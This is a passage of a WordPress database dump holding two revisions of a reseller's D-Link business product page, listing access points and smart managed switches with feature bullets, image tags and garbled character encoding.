Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-20 14:55:09','2018-12-20 06:55:09','',1480,'https://bintara.com.my/blog/2018/12/20/1480-revision-v1/',0,'revision','',0);
INSERT INTO `wpdp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (2658,1,'2018-12-20 14:56:04','2018-12-20 06:56:04','<h3>D - Link Business Solution Product </h3>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control 